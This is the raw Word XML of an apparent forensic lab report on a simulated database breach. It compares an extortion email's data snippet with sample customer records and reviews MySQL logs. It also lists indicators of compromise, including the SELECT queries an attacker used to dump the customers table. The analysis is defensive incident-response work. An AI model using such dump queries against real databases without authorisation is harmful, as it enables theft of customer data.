          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">2. **Compare Data Snippet:**</w:t>
      </w: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highlight w:val="none"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5943600" cy="5871437"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="7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80838" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId128"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943598" cy="58714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462.32pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId128" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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From the wireshark  webserver pcap file and phl_database_tables.txt file, the relevant records in the customers table are:</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rPr>
        <w:t xml:space="preserve">Carine Schmitt</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rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">(103,'Atelier graphique','Schmitt','Carine ','40.32.2555','54, rue Royale',NULL,'Nantes',NULL,'44000','France',1370,'21000.00')</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rPr>
        <w:t xml:space="preserve">Jean King</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w:t xml:space="preserve">(112,'Signal Gift Stores','King','Jean','7025551838','8489 Strong St.',NULL,'Las Vegas','NV','83030','USA',1166,'71800.00')</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rPr>
        <w:t xml:space="preserve">Peter Ferguson</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(114,'Australian Collectors, Co.','Ferguson','Peter','03 9520 4555','636 St Kilda Road','Level 3','Melbourne','Victoria','3004','Australia',1611,'117300.00')</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w:t xml:space="preserve">Janine Labrune</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(119,'La Rochelle Gifts','Labrune','Janine ','40.67.8555','67, rue des Cinquante Otages',NULL,'Nantes',NULL,'44000','France',1370,'118200.00')</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w:t xml:space="preserve">Jonas Bergulfsen</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highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">(121,'Baane Mini Imports','Bergulfsen','Jonas ','07-98 9555','Erling Skakkes gate 78',NULL,'Stavern',NULL,'4110','Norway',1504,'81700.00')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>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Conclusion</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highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">The data snippet provided in the extortion email matches the records in the customers  table of the database. This confirms that the attackers have access to  the database and have likely exfiltrated sensitive customer information.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>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t xml:space="preserve">3. **Check for Data Tampering:**</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t xml:space="preserve">   - Look for signs of data tampering, such as missing or altered records.</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t xml:space="preserve">   - Check if any new tables or records were added by the attackers.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>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 Overview of the Log</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log file contains MySQL database access logs, which record queries and actions performed by users. The log shows two main sessions:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Connected as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">root@localhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and performed various queries, including accessing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databases.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Also connected as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">root@localhost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and performed additional queries, including a full dump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Check for Data Tampering</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To identify signs of data tampering, we need to look for:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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Unauthorized modifications</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UPDATE</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DELETE</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ALTER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> queries).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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New tables or records</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> added by the attackers.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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Suspicious queries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> that could indicate data exfiltration or manipulation.</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Key Observations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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9</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0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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">03:01:02.437115Z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">03:01:02.459358Z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The user accessed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 and queried system tables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db</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tables_priv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, etc.).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">03:01:13.274934Z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: Switches to the phl database (Init DB phl) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">and performed the following queries:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">03:01:21.694024Z:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SELECT * FROM customers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: This query retrieves all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0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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">03:01:31.159492Z:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM customers LIMIT 5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: This query retrieves the first 5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0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No </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UPDATE</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DELETE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">INSERT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> queries were observed in this session.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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10</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0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user performed a full dump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using the query:</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rPr>
        <w:t xml:space="preserve">03:01:46.775014Z: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Query: SELECT /*!40001 SQL_NO_CACHE */ * FROM customers (dumps all records from the customers table).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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This query is typically used for database backups or data exfiltration.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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The user also locked the customers table (LOCK TABLES customers READ) before dumping the data, which is a common practice to ensure data consistency during backups.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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No UPDATE, DELETE, or INSERT queries were observed in this session.</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Signs of Tampering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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No Unauthorized Modifications</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: There are no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UPDATE</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DELETE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">INSERT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> queries in the log, which suggests that the attacker did not modify or delete any records in the database.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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No New Tables or Records</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: The log does not show any </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE TABLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER TABLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> queries, indicating that no new tables or columns were added by the attacker.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Data Exfiltration: The attacker performed a full dump of the customers table at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">03:01:46.775014Z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, which indicates that the data was exfiltrated but not tampered with.</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3. Indicators of Compromise (IOCs)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rPr>
        <w:t xml:space="preserve">Based on the log analysis, the following IOCs can be identified:</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Queries:</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SELECT * FROM customers (03:01:21.694024Z): Used to retrieve all customer records.</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SELECT /*!40001 SQL_NO_CACHE */ * FROM customers </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">(03:01:46.775014Z)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: Used to dump the customers table.</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User: root@localhost (the attacker likely used compromised credentials to access the database).</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Tables Accessed:</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customers: The attacker focused on exfiltrating data from this table.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20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user: The attacker queried the user table in the mysql database, possibly to gather information about database users.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
